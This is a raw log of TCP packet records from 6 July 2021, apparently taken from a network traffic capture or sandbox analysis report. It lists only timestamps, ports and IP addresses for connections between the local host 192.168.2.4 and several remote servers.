Jul 6, 2021 14:30:14.041261911 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.088129044 CEST	443	49791	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.088622093 CEST	443	49791	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.088643074 CEST	443	49790	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.088706970 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.088741064 CEST	49790	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.091022968 CEST	443	49791	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.091139078 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.091291904 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.138149023 CEST	443	49791	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.162528992 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.162600994 CEST	49793	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.207649946 CEST	443	49793	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.207675934 CEST	443	49792	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.207809925 CEST	49793	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.207967043 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.208682060 CEST	49793	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.208926916 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.255058050 CEST	443	49793	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.255098104 CEST	443	49793	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.255156040 CEST	443	49793	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.255182028 CEST	443	49792	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.255203962 CEST	443	49792	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.255220890 CEST	49793	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.255228043 CEST	443	49792	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.255458117 CEST	49793	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.255466938 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.270262957 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.270659924 CEST	49793	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.271240950 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.316215038 CEST	443	49792	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.316469908 CEST	443	49792	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.316550970 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.316641092 CEST	443	49793	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.316760063 CEST	49793	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:14.341044903 CEST	443	49792	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.341072083 CEST	443	49792	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:14.341195107 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:15.646289110 CEST	49788	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:15.646600008 CEST	49790	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:15.646651030 CEST	49793	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:15.646671057 CEST	49792	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:18.217091084 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.217283964 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.374068975 CEST	443	49794	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.374180079 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.377460957 CEST	443	49795	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.377546072 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.398345947 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.398785114 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.558254004 CEST	443	49794	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.558276892 CEST	443	49794	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.558295965 CEST	443	49794	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.558374882 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.558417082 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.562762976 CEST	443	49795	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.564013958 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.564052105 CEST	443	49795	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.564080954 CEST	443	49795	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.564124107 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.564136982 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.587663889 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.593532085 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.593674898 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.745698929 CEST	443	49794	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.745968103 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.755820036 CEST	443	49794	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.757622004 CEST	443	49795	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.757766962 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.757865906 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.757890940 CEST	49794	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:18.840954065 CEST	49796	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.841006994 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.888257027 CEST	443	49797	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:18.888289928 CEST	443	49796	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:18.888509989 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.891252041 CEST	49796	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.914378881 CEST	443	49794	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:18.918586969 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.919363976 CEST	49796	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.967315912 CEST	443	49797	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:18.967350006 CEST	443	49797	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:18.967372894 CEST	443	49797	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:18.967433929 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.967497110 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.967819929 CEST	443	49796	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:18.967861891 CEST	443	49796	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:18.967884064 CEST	443	49796	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:18.967936993 CEST	49796	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.967983007 CEST	49796	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.980150938 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.981008053 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:18.981513977 CEST	49796	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:19.029223919 CEST	443	49797	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:19.029789925 CEST	443	49797	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:19.029962063 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:19.031482935 CEST	443	49796	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:19.031922102 CEST	49796	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:19.032274961 CEST	443	49797	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:19.032351971 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:19.032529116 CEST	49797	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:19.081289053 CEST	443	49797	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:19.112874985 CEST	49798	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.113919973 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.157949924 CEST	443	49798	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.158845901 CEST	443	49799	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.158983946 CEST	49798	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.158984900 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.164480925 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.165487051 CEST	49798	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.210581064 CEST	443	49799	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.210619926 CEST	443	49799	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.210640907 CEST	443	49799	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.210717916 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.210746050 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.211333036 CEST	443	49798	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.211359024 CEST	443	49798	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.211380959 CEST	443	49798	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.211421967 CEST	49798	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.211474895 CEST	49798	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.221987963 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.222065926 CEST	49798	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.222667933 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.267568111 CEST	443	49799	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.268176079 CEST	443	49798	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.268199921 CEST	443	49799	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.268269062 CEST	49798	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.268832922 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.290978909 CEST	443	49799	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.291013002 CEST	443	49799	40.101.81.146	192.168.2.4
Jul 6, 2021 14:30:19.291059017 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:19.291088104 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:20.742893934 CEST	49795	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:20.743001938 CEST	49798	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:20.743129015 CEST	49796	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:20.743169069 CEST	49799	443	192.168.2.4	40.101.81.146
Jul 6, 2021 14:30:25.254190922 CEST	49807	80	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.254308939 CEST	49808	80	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.297161102 CEST	80	49807	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.297346115 CEST	49807	80	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.297535896 CEST	80	49808	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.297626972 CEST	49808	80	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.428689957 CEST	49807	80	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.471008062 CEST	80	49807	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.471698999 CEST	80	49807	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.471719027 CEST	80	49807	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.471776009 CEST	49807	80	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.473886013 CEST	49807	80	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.493807077 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.517102957 CEST	80	49807	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.535787106 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.535918951 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.541193962 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.583655119 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.584350109 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.584373951 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.584393978 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.584408998 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.584460020 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.585416079 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.616653919 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.623737097 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.624044895 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.660190105 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.660402060 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.660427094 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.660461903 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.660489082 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.663938046 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.666977882 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.667001009 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.667093039 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.668050051 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.668070078 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.670454025 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:25.709657907 CEST	443	49809	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:25.739841938 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.741636038 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.783996105 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.784138918 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.785757065 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.786089897 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.786283970 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.789726019 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.830319881 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.831022024 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.831057072 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.831079006 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.831125975 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.831150055 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.833863020 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.834691048 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.834723949 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.834745884 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.834791899 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.834852934 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.835362911 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.835745096 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.836251020 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.839766979 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.840106010 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.879462004 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.879854918 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.880083084 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.880158901 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.880171061 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.880187035 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.880228043 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.880314112 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.880820990 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.885488987 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.886082888 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.886190891 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.886225939 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.886228085 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.886260033 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.886279106 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903100014 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903140068 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903148890 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903162003 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903182030 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903199911 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903201103 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903214931 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903230906 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903244019 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903244019 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903255939 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903270960 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903280973 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903285027 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903309107 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903328896 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903342009 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903346062 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903357983 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903372049 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.903381109 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903419971 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.903450012 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.924510956 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.924896002 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.925005913 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:25.947480917 CEST	443	49811	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.947511911 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:25.947623014 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:26.701535940 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:26.746643066 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:26.749732018 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:26.749764919 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:26.749842882 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:26.749891043 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:27.171129942 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:27.215442896 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:27.217921972 CEST	443	49810	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:27.218015909 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:27.322635889 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.323930025 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.369131088 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.369218111 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.370053053 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.370493889 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.370605946 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.371408939 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.415446997 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.416132927 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.416172981 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.416193008 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.416213036 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.416246891 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.416251898 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.416481972 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.417228937 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.417262077 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.417283058 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.417294025 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.417320013 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.417325020 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.421184063 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.421730995 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.422086954 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.429145098 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.429718971 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.466298103 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.466927052 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.466953039 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.467017889 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.467031002 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.467089891 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.467107058 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.467173100 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.467238903 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.467674017 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.467700005 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.467746019 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.467765093 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.468038082 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.473639965 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.473941088 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.474286079 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.474311113 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.474344969 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.474368095 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.474419117 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.474472046 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.487896919 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:27.512450933 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:27.532267094 CEST	443	49822	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:28.258543968 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:28.303049088 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:28.303404093 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:28.303441048 CEST	443	49821	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:28.303504944 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:28.303534985 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:28.379766941 CEST	49826	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.381011963 CEST	49827	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.424546957 CEST	443	49826	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.425299883 CEST	443	49827	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.425391912 CEST	49826	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.425401926 CEST	49827	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.437469959 CEST	49827	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.437489986 CEST	49826	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.481889963 CEST	443	49826	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.481923103 CEST	443	49826	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.481940031 CEST	443	49826	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.481964111 CEST	443	49827	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.481982946 CEST	443	49827	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.481997013 CEST	443	49827	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.482013941 CEST	49826	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.482049942 CEST	49826	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.482059002 CEST	49827	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.482086897 CEST	49827	443	192.168.2.4	195.20.250.115
